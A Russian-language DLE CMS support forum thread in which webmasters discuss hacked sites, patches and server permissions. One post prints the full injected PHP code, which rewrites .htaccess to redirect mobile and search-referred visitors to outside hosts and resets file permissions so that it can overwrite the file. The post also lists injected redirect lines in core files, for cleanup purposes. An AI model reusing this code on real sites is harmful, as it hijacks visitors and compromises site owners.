Перейти к публикации

Рекомендованные сообщения

celsoft, патчи ваши не помогают) ищите дыры. Поменял все пароли, поменял все файлы движов, поставил патчи, поставил на конфиги права "444" чтобы не меняли содержимое (временная мера пока вы что-то не придумаете), в итоге сегодня захожу каспер ругается, добавили строки в main.tpl, ФТП вообще не юзаю. В списках действий админпанели ничего нет подозрительного. Пароли были поменяны. пока поставил 444 и на файлы шаблона. Дыра всё такие есть!

А на счет высказываний про онлайн кинотеатры и варезники) По всей видимости того кого НЕ ломают, просто посещаемость низкая, и такие слабенькие сайты никого не интересуют.

Ссылка на сообщение
Поделиться на других сайтах

angeles89,

Уже неоднократно было написано, если вы не можете справиться с проблемой, то обращайтесь в тех. поддержку http://dle-news.ru/index.php?do=feedback предоставляйте доступы по FTP и к админпанели скрипта, ваш сервер будет проанализован и оказана помощь. В запросе незабудьте описать подробно свою проблему и что именно у вас делают на сервере.

Ссылка на сообщение
Поделиться на других сайтах

А вы не можете решить проблему глобально у всех выпустив еще патч? Чем у каждого ковыряться на сервере. На счёт ФТП я сказал я их не использую)

Ссылка на сообщение
Поделиться на других сайтах

А вы не можете решить проблему глобально у всех выпустив еще патч?

Понятно. Нелегальная копия скрипта, поэтому и невозможность предоставить доступы к сайту.

На счёт ФТП я сказал я их не использую)

Предоствляйте по SSH это не проблема. Файлы на вашем сервере не из воздуха появляются. Можно предоставить доступ с помощью которого заливаются файлы на сервер.

Ссылка на сообщение
Поделиться на других сайтах

Понятно. Нелегальная копия скрипта, поэтому и невозможность предоставить доступы к сайту.

Дело в том что у меня куча модифицировано лично мной файлов движка. И установлено куча сторонрих модулей. Но я уверяю вас что у вас где-то дырка. Иначе б была проблема не такая глобальная.

Изменено пользователем angeles89
Ссылка на сообщение
Поделиться на других сайтах

angeles89,

По вашему в сторонних модулях дыр быть не может? Я в этом не уверен. И мне странно почему вы в этом уверены. И ваши сторонние модули никто удалять не собирался, просто мне лично известно достаточно много сторонних модулей, где я знаю точно о наличии уязвимостей и как минимум я могу дать рекомендации что нужно убрать.

Ссылка на сообщение
Поделиться на других сайтах

celsoft, может ввести дополнительное обязательное правило на форуме для всех, у кого имеется лицензия на движок, в случае появления следов взлома в обязательном порядке предоставлять доступ к сайту службе поддержки для выявления причин и анализа? В случае отказа предоставить доступ просто удалять эти сообщения или как-то еще реагировать... Большинство сообщений - просто вода типа "мой сайт взломали", "шелл залили" и т.д.

Народ, как по вашему службе поддержки реагировать на ваши сообщения? По звездам гадать или на картах таро? Быстрее проанализируют ваши взломанные сайты, значит, быстрее будут внесены изменения в движок, если действительно дело в файлах скрипта, а не в вашей халатности, устаревшем серверном ПО или ещё чём-то... Хотите помочь себе - помогите службе поддержки в определении причин взлома...

  • Поддерживаю 4
Ссылка на сообщение
Поделиться на других сайтах

Аналогично, сайт взломали пару дней назад, на те же мобильные уйстроства.

ИСпользую исключительно лицензионные версии DLE уже подрят 5 лет на несколько сайтов.. Патчи обновлялись сразу в тот же день, так как регулярно посещаю форумы и DLE.

Сайт взломан 15.01.12.

Доступ к фтп. по 1 IP и аналогично к БД всем другим ип-шкам доступ закрыт.

Решения пока-что негде не нашел, вижу взломан может быть любой из сайтов.

Из 3 сайтов взломан самый крупный посещаемость его большая, поэтому сайт не может быть не замечен . Скорее всего остальные наши сайты пока просто не нашли.

Будем ждать решения ... На серче по этому поводу уже 11 страниц накатали разные владельцы ресурсов, решения нормального негде нет.

Изменено пользователем filmxago
Ссылка на сообщение
Поделиться на других сайтах

izbushkin, с андроида все ок, обновления браузера не всплывают. Проверил только главную.

Спасибо!

Думаю, что вредоносных кодов и вирусов нет. Но что тогда так сильно нагружает сервер?

И это пошло сразу после взлома...

Тут дело не в картинках. Видимо на сервере что то.

Ссылка на сообщение
Поделиться на других сайтах

izbushkin, с андроида все ок, обновления браузера не всплывают. Проверил только главную.

Спасибо!

Думаю, что вредоносных кодов и вирусов нет. Но что тогда так сильно нагружает сервер?

И это пошло сразу после взлома...

Тут дело не в картинках. Видимо на сервере что то.

Судя потому, что бьют только одни и те же файлы, все-таки дело в каком то стороннем модуле. Посмотрите в index.php какой модуль подгружаете или инициализируете в init.php.

Изменено пользователем dakk
Ссылка на сообщение
Поделиться на других сайтах

Но дело в том, что все эти "шустрые" сайты не держат на своем сервере картинки!

не знаю расстрою вас или обрадую, но есть много сайтов с посещалкой десятки тысяч в сутки, которые держат картинки у себя же на сервере.

А на счет высказываний про онлайн кинотеатры и варезники) По всей видимости того кого НЕ ломают, просто посещаемость низкая, и такие слабенькие сайты никого не интересуют.

это все пустое. вопрос взлома актуален для всех, просто выдавать варезник за не варезник не нужно)

Ссылка на сообщение
Поделиться на других сайтах

это все пустое. вопрос взлома актуален для всех, просто выдавать варезник за не варезник не нужно)

Видимо Вы просто не знаете различий между варезником и тематическим сайтом.

Для того чтобы Вы знали: Варезники - это сайты, где ссылки для закачки ведут на файлообменные сервисы.

Дальнейший спор и пререкания считаю бессмысленными.

Каждый останется при своем мнении.

Ссылка на сообщение
Поделиться на других сайтах

izbushkin, с андроида все ок, обновления браузера не всплывают. Проверил только главную.

Спасибо!

Думаю, что вредоносных кодов и вирусов нет. Но что тогда так сильно нагружает сервер?

И это пошло сразу после взлома...

Тут дело не в картинках. Видимо на сервере что то.

Судя потому, что бьют только одни и те же файлы, все-таки дело в каком то стороннем модуле. Посмотрите в index.php какой модуль подгружаете или инициализируете в init.php.

Получил ответ от хостинг-провайдера. Никаких проблем на сервере и серверном ПО не обнаружено.

Скорее всего проблема с каким-либо из сайтов.

Сам пока не могу её обнаружить. Был бы очень полезен штатный антивирус, но он у меня не срабатывает. Видимо много файлов.

Ссылка на сообщение
Поделиться на других сайтах

Видимо Вы просто не знаете различий между варезником и тематическим сайтом. Для того чтобы Вы знали: Варезники - это сайты, где ссылки для закачки ведут на файлообменные сервисы.

видимо да, не знаю, так как в общепринятом понимании слова варез - это любые софт/графические/аудио/видео материалы, распространяемые без соблюдения авторских прав ;)

тематический сайт, ага)

Ссылка на сообщение
Поделиться на других сайтах

может celsoft провести конкурс на взлом движка. Тем, кто нашел дыры...пожизненные лицухи в подарок. а?

думаю найдутся желающие...

  • Поддерживаю 1
Ссылка на сообщение
Поделиться на других сайтах

Ребята. Может стоит указать у кого какие стоят сторонние модули?

Может у всех стоит одинаковый модуль и именно всему виной....

Ссылка на сообщение
Поделиться на других сайтах

Меня тоже взломали, есть лицензии на движки, доступ закрыт по айпи адресу на сервер по ftp, и на панель... Все пачти были установлены... яндекс уже написал что на сайте вирус... коды нашел и убрал, но не знаю где они еще могут быть...

Что меня удивило, что права на важных файлах кто-то поменял на config.php итп на 666...

Почти на всех дле сайтах вирус (все на 1 сервере), на других движках вируса нет....

могу прислать логи ошибок и доступа...

Ссылка на сообщение
Поделиться на других сайтах

могу прислать логи ошибок и доступа...

Нужно обращаться и присылать, из доступов необходим доступ по FTP и к админпанели скрипта.

Ссылка на сообщение
Поделиться на других сайтах

могу прислать логи ошибок и доступа...
Нужно обращаться и присылать, из доступов необходим доступ по FTP и к админпанели скрипта.

Хорошо, я ваам напишу по личной переписке...

Ссылка на сообщение
Поделиться на других сайтах

1. Ну для начала, пройтись по логам, выловить там TOR-сервера и забанить по IP

2. Осматривать нужно не только взломаный сайт, но вообще все сайты на учетке

3. Понизить права php только папкой сайта

Re: я один из первых попал под раздачу "слонов" (http://forum.dle-news.ru/index.php?showtopic=61684), тогда видимо эту дыру обкатывали, теперь она пошла в массы школников.

Спасибо Spinne с WebimhoRu, вычистил, и настроил все нормально.

Изменено пользователем MiXa
Ссылка на сообщение
Поделиться на других сайтах

А если закрыть доступ по IP? только с одного IP. Зальют? У меня тоже такой код прописан был. Изменил сегодня файл admin.php на свой и пароль поменял.

Ссылка на сообщение
Поделиться на других сайтах

Вы все умничаете и даете советы поставить права на файл и так далее ..Хотя сами структуры шелла не знаете вот вам для общего ознакомления


ini_set('display_errors', 0);

error_reporting(0);

$MaineURl = 'http://mobi-bro.com/l=3241101b056e0b4d03565714564f0e5820095d450a6e';

$MainHtaccess =

"

RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} acs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alav [NC,OR]

RewriteCond %{HTTP_USER_AGENT} alca [NC,OR]

RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} audi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} aste [NC,OR]

RewriteCond %{HTTP_USER_AGENT} avan [NC,OR]

RewriteCond %{HTTP_USER_AGENT} benq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} bird [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blac [NC,OR]

RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR]

RewriteCond %{HTTP_USER_AGENT} brew [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cell [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cldc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} cmd- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} dang [NC,OR]

RewriteCond %{HTTP_USER_AGENT} doco [NC,OR]

RewriteCond %{HTTP_USER_AGENT} eric [NC,OR]

RewriteCond %{HTTP_USER_AGENT} hipt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} inno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipaq [NC,OR]

RewriteCond %{HTTP_USER_AGENT} java [NC,OR]

RewriteCond %{HTTP_USER_AGENT} jigs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} kddi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} keji [NC,OR]

RewriteCond %{HTTP_USER_AGENT} leno [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-c [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-d [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lg-g [NC,OR]

RewriteCond %{HTTP_USER_AGENT} lge- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maui [NC,OR]

RewriteCond %{HTTP_USER_AGENT} maxo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mits [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmef [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mot- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} moto [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mwbp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} nec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]

RewriteCond %{HTTP_USER_AGENT} noki [NC,OR]

RewriteCond %{HTTP_USER_AGENT} opwv [NC,OR]

RewriteCond %{HTTP_USER_AGENT} palm [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pana [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pant [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pdxg [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phil [NC,OR]

RewriteCond %{HTTP_USER_AGENT} play [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pluc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} port [NC,OR]

RewriteCond %{HTTP_USER_AGENT} prox [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qtek [NC,OR]

RewriteCond %{HTTP_USER_AGENT} qwap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sage [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sams [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sany [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sch- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sec- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} send [NC,OR]

RewriteCond %{HTTP_USER_AGENT} seri [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sgh- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} shar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sie- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} siem [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smal [NC,OR]

RewriteCond %{HTTP_USER_AGENT} smar [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sony [NC,OR]

RewriteCond %{HTTP_USER_AGENT} sph- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symb [NC,OR]

RewriteCond %{HTTP_USER_AGENT} t-mo [NC,OR]

RewriteCond %{HTTP_USER_AGENT} teli [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tim- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tosh [NC,OR]

RewriteCond %{HTTP_USER_AGENT} tsm- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upg1 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} upsi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} vk-v [NC,OR]

RewriteCond %{HTTP_USER_AGENT} voda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} w3cs [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapa [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapi [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wapr [NC,OR]

RewriteCond %{HTTP_USER_AGENT} webc [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} winw [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} xda- [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.browser [NC,OR]

RewriteCond %{HTTP_USER_AGENT} up.link [NC,OR]

RewriteCond %{HTTP_USER_AGENT} windows.ce [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iemobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mmp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} symbian [NC,OR]

RewriteCond %{HTTP_USER_AGENT} midp [NC,OR]

RewriteCond %{HTTP_USER_AGENT} wap [NC,OR]

RewriteCond %{HTTP_USER_AGENT} phone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipad [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iPad [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iPhone [NC,OR]

RewriteCond %{HTTP_USER_AGENT} ipod [NC,OR]

RewriteCond %{HTTP_USER_AGENT} iPod [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pocket [NC,OR]

RewriteCond %{HTTP_USER_AGENT} mobile [NC,OR]

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Android [NC,OR]

RewriteCond %{HTTP_USER_AGENT} pda [NC,OR]

RewriteCond %{HTTP_USER_AGENT} PPC [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Series60 [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Opera.Mini [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Moby [NC,OR]

RewriteCond %{HTTP_USER_AGENT} Mobi [NC,OR]

RewriteCond %{HTTP_ACCEPT} 'text/vnd.wap.wml|application/vnd.wap.xhtml+xml' [NC,OR]

RewriteCond %{HTTP_USER_AGENT} !windows.nt [NC]

RewriteCond %{HTTP_USER_AGENT} !bsd [NC]

RewriteCond %{HTTP_USER_AGENT} !x11 [NC]

RewriteCond %{HTTP_USER_AGENT} !unix [NC]

RewriteCond %{HTTP_USER_AGENT} !macos [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !playstation [NC]

RewriteCond %{HTTP_USER_AGENT} !google [NC]

RewriteCond %{HTTP_USER_AGENT} !yandex [NC]

RewriteCond %{HTTP_USER_AGENT} !bot [NC]

RewriteCond %{HTTP_USER_AGENT} !libwww [NC]

RewriteCond %{HTTP_USER_AGENT} !msn [NC]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !fdm [NC]

RewriteCond %{HTTP_USER_AGENT} !maui [NC]

RewriteCond %{HTTP_USER_AGENT} !webmoney [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ $MaineURl [L,R=302]

RewriteEngine on

RewriteCond %{HTTP_REFERER} ^http://(www\.)?google\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://go\.mail\.ru/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?yandex\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?vk\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?ya\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?ask\.(ru|com|kz|com|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://googleads\.g\.doubleclick\.net/.*$ [NC]

RewriteRule ^(.*)$ http://goo.gl/gpWMY [R=302,L]

";

$MyKeyvord = $MaineURl;

$mPath = pathinfo($_SERVER['SCRIPT_FILENAME']);

$nameFiles = $mPath['dirname'].'/.htaccess';

$StarHtaccess = file_get_contents($nameFiles);

preg_match('/(?<=RewriteRule).*(?=\[L\,R\=302\])/',$StarHtaccess, $matches);

$proverka = strpos($matches[0], $MyKeyvord);


if ($proverka === false) {

chmod($nameFiles,0666);

$NewHtaccess = $MainHtaccess. "\r\n" .$StarHtaccess;

$fp = fopen($nameFiles, "w");

fwrite($fp, $NewHtaccess);

fclose($fp);

} else {

chmod($nameFiles,0444);

}

Сколько бы вы не ставили права эта гадость будет их сбрасывать :

if ($proverka === false) {

chmod($nameFiles,0666);

$NewHtaccess = $MainHtaccess. "\r\n" .$StarHtaccess;

$fp = fopen($nameFiles, "w");

fwrite($fp, $NewHtaccess);

fclose($fp);

} else {

chmod($nameFiles,0444);

}

Так что нужно полностью вырезать этот говно-код и ставить последний пачт.. Аппаратной сороки ответа шелла на другой сайт не было обнаружено как и самого шелла в DLE . Для того что бы быть полностью уверенными что все очистили проверять данные файлы:

./index.php: header('Location: http://statuses.ws/');

./index.php: header('Location: http://statuses.ws/');

./engine/engine.php: header('Location: http://statuses.ws/');

./engine/engine.php: header('Location: http://statuses.ws/');

./engine/engine.php: header('Location: http://statuses.ws/');

./engine/engine.php: header('Location: http://statuses.ws/');

./engine/data/dbconfig.php: header('Location: http://statuses.ws/');

./engine/data/dbconfig.php: header('Location: http://statuses.ws/');

./engine/data/dbconfig.php: header('Location: http://statuses.ws/');

./engine/data/config.php: header('Location: http://statuses.ws/');

./engine/init.php: header('Location: http://statuses.ws/');

./engine/init.php: header('Location: http://statuses.ws/');

./engine/init.php: header('Location: http://statuses.ws/');

после полной очистки наберете в браузерную строку site.ru/index.php проверяете .htaccess на наличие вот такого кода :

RewriteEngine on

RewriteCond %{HTTP_REFERER} ^http://(www\.)?google\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://go\.mail\.ru/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?yandex\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?vk\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?ya\.(ru|com|kz|ua|com\.ua)/.*$ [NC,OR]

RewriteCond %{HTTP_REFERER} ^http://(www\.)?ask\.(ru|com|kz|com|ua|com\.ua)/.*$

Если после этих манипуляций у вас в .htaccess не появилась эта абракадабра, вы очистили сайт от данного вреда.

Изменено пользователем Яндекс
  • Поддерживаю 1
Ссылка на сообщение
Поделиться на других сайтах

А если закрыть доступ по IP? только с одного IP. Зальют? У меня тоже такой код прописан был. Изменил сегодня файл admin.php на свой и пароль поменял.

У меня был изменен admin.php , но все равно зловредный код появился. Но я обновления от новых уязвимостей вовремя не ставил. Пришлось делать откат базы. Вторые сутки пока нормально.

Ссылка на сообщение
Поделиться на других сайтах

Вы все умничаете и даете советы поставить права на файл и так далее ..Хотя сами структуры шелла не знаете вот вам для общего ознакомления

Сколько бы вы не ставили права эта гадость будет их сбрасывать :

if ($proverka === false) {

chmod($nameFiles,0666);

$NewHtaccess = $MainHtaccess. "rn" .$StarHtaccess;

$fp = fopen($nameFiles, "w");fwrite($fp, $NewHtaccess);fclose($fp);

} else {chmod($nameFiles,0444);}

Может вам самим стоит изучить мат часть? С каких пор chmod() можно применять, если файл принадлежит другому владельцу? На "криво" настроенных хостингах и серверах, да такое возможно. О чем уже написано огромное количество раз. По вашему для чего придумано разделение прав, если их можно было бы менять кому угодно при помощи обычной функции chmod. Из всех PHP и .htaccess права на запись должны иметь только файлы ./engine/data/config.php и ./engine/data/dbconfig.php. У всех кому изменили другие файлы php или .htaccess априори имеют неправильные настройки сервера, где безопасность на последнем месте.

Поэтому помимо патчей, безопасной и правильной настройки сервера еще никто не отменял.

  • Поддерживаю 1
Ссылка на сообщение
Поделиться на других сайтах

Вы все умничаете и даете советы поставить права на файл и так далее ..Хотя сами структуры шелла не знаете вот вам для общего ознакомления

Сколько бы вы не ставили права эта гадость будет их сбрасывать :

if ($proverka === false) {

chmod($nameFiles,0666);

$NewHtaccess = $MainHtaccess. "rn" .$StarHtaccess;

$fp = fopen($nameFiles, "w");fwrite($fp, $NewHtaccess);fclose($fp);

} else {chmod($nameFiles,0444);}

Может вам самим стоит изучить мат часть? С каких пор chmod() можно применять, если файл принадлежит другому владельцу? На "криво" настроенных хостингах и серверах, да такое возможно. О чем уже написано огромное количество раз. По вашему для чего придумано разделение прав, если их можно было бы менять кому угодно при помощи обычной функции chmod. Из всех PHP и .htaccess права на запись должны иметь только файлы ./engine/data/config.php и ./engine/data/dbconfig.php. У всех кому изменили другие файлы php или .htaccess априори имеют неправильные настройки сервера, где безопасность на последнем месте.

Поэтому помимо патчей, безопасной и правильной настройки сервера еще никто не отменял.

Да-да я с вами полностью согласен... Но все же факт остается фактом. Довольно часто не опытные вебмастера ставят DLE на не настроенные сервера и всплывают вот такие вот шеллы и т.д Так что теорию с настройками сервера и ( не качественным хостингом ) не кто не отменял... Изменено пользователем Яндекс
Ссылка на сообщение
Поделиться на других сайтах
Гость
Эта тема закрыта для публикации сообщений.
×
×
  • Создать...